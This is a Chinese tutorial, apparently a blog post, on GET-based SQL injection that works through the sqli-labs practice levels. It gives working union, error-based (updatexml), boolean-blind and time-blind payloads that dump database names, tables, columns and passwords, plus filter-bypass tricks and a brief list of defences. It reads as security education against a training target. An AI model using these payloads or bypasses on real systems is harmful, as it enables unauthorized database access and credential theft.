当前位置：首页 > article >正文

SQL注入漏洞基础（GET）

article 2026/5/5 12:30:21

SQL注入概述SQL注入是一种常见的网络安全漏洞攻击者通过在应用程序的输入字段中插入恶意SQL代码欺骗数据库执行非预期的命令。登录实例在登录中SQL查询语句select * from 表名 where user用户名 and password密码当我们在登录框输入admin or 11--这段SQL语句就变成了select * from 表名 where useradmin or 11 -- and password 密码在user变量加入的admin or 11--admin后的与前面的闭合or 11 的结果是恒成立的最后的--注释了后面的语句导致漏洞发生登录成功攻击方式1.union联合查询使用union合并多个select语句从而引发漏洞2.报错注入通过构造恶意SQL语句触发数据库错误利用数据库报错信息泄露的数据实现漏洞。3.布尔盲注在无法直接获取数据时我们需要通过网页的变化来判断对错逐步推理出信息引发漏洞。4.时间盲注与布尔盲注基本相同通过·sleep在条件成立时延时返回从而推理出信息实现漏洞。攻击流程1.寻找注入点寻找可能出现注入漏洞的地方使用字符串测试等观察系统响应是否异常2.提取数据利用注入点逐步获取数据库结构信息3.提权尝试提升权限或建立持久化访问常见绕过方式1.大小写绕过黑名单检测时通过夹杂大小写来绕过验证不影响代码执行2.编码绕过·通过URL编码来绕过限制3.双写绕过在关键字会被替换为空的时候我们可以将关键字双写如ununionion中间的关键字被替换剩下的可以组成一个新的关键字4.内联注释绕过在MySQL中注释可以被当作SQL语句执行如/*!select*/ * from table;防御方式1.参数化查询使用预编译语句将SQL代码与数据分离数据库会预先编译SQL结构用户输入仅作为数据处理。2.输入验证与过滤白名单验证只允许特定字符黑名单验证转义或移除危险字符3.最小权限数据库账户只授予必要权限禁止应用账户使用敏感权限靶场演示sqli靶场1.union联合查询在sqli前1-4关均使用union联合查询Less11.判断注入类型注入类型可分为数字型和字符型区别在于闭合形式的不同数字型不需要添加字符闭合字符型需要添加符号闭合SQL语句根据报错信息可以判断出闭合符号。在输入框中输入单引号观察是否报错若出现SQL语法错误可能存在单引号闭合的注入点如图在加入?id1时出现报错则证明时是字符型注入然后我们加入 order by 来确定列数当我们输入 order by 3 正常order by 4 报错时证明有3列然后我们寻找回显点先将id值改为不成立的值比如-1这样只会显示union的结果?id1 union select 1,2,3 --这里显示数字的地方就是回显点我们需要在有回显的地方加入恶意的SQL语句?id-1 union select 1,database(),3 --这里我们加入database()即可获取数据库名接下来取表名?id-1 union select 1,group_concat(table_name),3 from information_schema.tables where table_schemadatabase() --information库是储存所有表数据的数据库拿到表名接下来取字段名我们查看users表的字段id-1 union select 1,group_concat(column_name),3 from information_schema.columns where table_schemadatabase() and table_name users --拿到字段名接下来取数据因为有两个回显点所以我们可以一次取多个数据拿到数据后三关基本相似均使用union联合查询只是闭合方式不同Less2数字型注入不需要添加闭合Less3字符型注入使用)闭合Less4字符型注入使用)闭合2.报错注入在无回显位的情况下我们可以用报错注入来利用漏洞通过构造特殊SQL语句触发数据库报错使错误信息中包含数据库结构、表名、字段名或具体数据。报错注入函数updatexml() 报错AND updatexml(1, concat(0x7e, (SELECT user()), 0x7e), 1)extractvalue() 报错AND extractvalue(1, concat(0x7e, (SELECT database()), 0x7e))floor() 报错AND (SELECT 1 FROM (SELECT count(*), concat((SELECT user()), floor(rand(0)*2)) x FROM information_schema.tables GROUP BY x) y)在这我使用updatexml()报错演示Less5在这一关中没有回显点所以应该使用报错注入首先判断闭合方式加入发生报错所以是单引号闭合然后我们查数据库id1 and (updatexml(1,concat(0x7e,database(),0x7e),1)); --0x7e是~的十六进制表示用来标记数据边界也可以替换成其他字符拿到数据库名然后我们继续拿表名?id1 and (updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schemadatabase()),0x7e),1)) --拿到表名然后继续拿users表的字段名?id1 and (updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schemadatabase() and table_nameusers),0x7e),1)) --拿到字段名然后拿数据?id1 and (updatexml(1,concat(0x7e,(select group_concat(password) from users),0x7e),1)) --拿到数据3.布尔盲注通过观察应用程序对不同布尔条件的响应差异如页面内容变化、HTTP状态码或响应时间来推断数据库中的信息简单来说就是猜。Less8:在这一关中由于无法直接获取查询结果所以我们需要进一步的推测。可以看到并不会返回任何信息我们先判断数据库长度?id1 and (length(database())n)--7时页面正常8时无回显可以判断出数据库长度8接下来继续推理出数据库名称?id1 and (ascii(substr(database(),1,1))n)--这段代码的效果是将数据库名称的第一个字符提取出来并编译为ASCII码然后进行判断取后面几位表只需要更改substr的截取位即可使用二分法来逐步缩小范围对照ASCII码表来判断这里为了省事跳过推理过程数据库名为security接下来推理表判断表数量?id1 and (select count(*) from information_schema.tables where table_schemasecurity)n--判断出表数量为4然后判断表名?id1 and (ascii(substr(select table_name from information_schema.tables where table_schemasecurity limit 0,1)1,1)n))--limit用来限制返回的结果通过修改值来查询不同表。推理出users表同理推出字段?id1 and (select count(*) from information_schema.columns where table_schemasecurity and table_nameusers)n--判断字段数判断出字段数为3然后我们判断字段名?id1 and (ascii(substr(select column_name from information_schema.columns where table_schemasecurity and table_nameusers limit 0,1)1,1)n))--推理出password列然后推理数据名?id1 and (ascii(substr((select password from users limit 0,1),1,1))n)--就可以推理出数据·由于手工注入的工作量是非常庞大的所以我们可以使用自动化注入工具比如最常见的SQLmap也可以自己编写python脚本4.时间盲注时间盲注过程与布尔盲注相同在页面无变化时用到加入sleep函数在特定条件下延迟响应达到盲注的效果。Less9我们首先进行判断在这一关中不管我们输入的是否成立页面均无区别所以我们需要用到时间盲注?id1 and if(11,sleep(3),1)--判断闭合方式为接下来判断数据库长度?id1 and if((length(database())n),sleep(3),1)--判断数据库长度为8接下来判断数据库名?id1 and if((ascii(substr(database(),1,1))n),sleep(3),1)--其余流程相同在这里就不一一尝试了结束本篇主要讲解SQL注入GET方式的基本注入方式所用靶场sqli其他SQL注入方式会在后面的篇章中讲解。感谢观看。

SQL注入漏洞基础（GET）

相关文章：

SQL注入漏洞基础（GET）

AI赋能统计学教学：多伦大STA130课程如何重塑数据科学学习

对比直接使用原厂API与通过Taotoken调用在账单清晰度上的差异

UE5 MCP Bridge：用AI助手自动化虚幻引擎编辑器操作

多核处理器与虚拟化技术实践解析

ThinkRAG：基于LlamaIndex与Streamlit的本地化中文知识库问答系统实践

在Node.js后端服务中集成Taotoken多模型API提升开发效率

Flutter与Firebase实战：从零构建社区活动App的完整指南

Mindra 全天候智能体团队指挥中心技术架构、核心原理与工程实现深度解析

FanControl：如何解决Windows风扇控制中的三大常见痛点

wiliwili：跨平台B站客户端终极使用指南

Datasette ChatGPT插件：用自然语言查询SQLite数据库的实践指南

Honey Select 2终极增强方案：如何一键解锁完整游戏体验

YimMenu：GTA5最强防护菜单，让洛圣都之旅更安全更有趣！

对比测试不同模型在代码生成任务上的响应速度与稳定性

【管理科学】第三十五篇管理者立威和威权建立方法01

如何在本地快速搭建AI助手：使用llama-cpp-python的完整指南

Navicat密码解密终极指南：5分钟找回遗忘的数据库连接密码

Onekey：3分钟完成Steam游戏解锁的终极免费工具指南

终极指南：Awoo Installer - 让Switch游戏安装变得简单高效的免费解决方案

九大网盘直链解析：智能自动化下载解决方案

Lumafly：当魔法与代码相遇，空洞骑士模组管理的优雅交响

避开这些坑，你的HC-SR04测距才准：51单片机实战中的时序、精度与干扰处理

Lumafly模组管理器：空洞骑士玩家的终极跨平台模组管理解决方案

TrguiNG：让Transmission下载管理变得轻松愉快的终极中文增强方案

开源项目如何重构直播数据价值体系：DouyinLiveRecorder的技术架构与数据捕获实践

从B站教程到实战避坑：3ds Max 2018模型缩放100倍导入UE5的完整流程（附素材）

如何快速修复ComfyUI-ControlNet-Aux中Depth Anything节点报错问题

AI Agent Skills 数量爆炸治理方案：从混沌到有序的系统性实践

别再只会点灯了！用STM32F103C8T6和独立按键做个实用小灯控（附完整代码）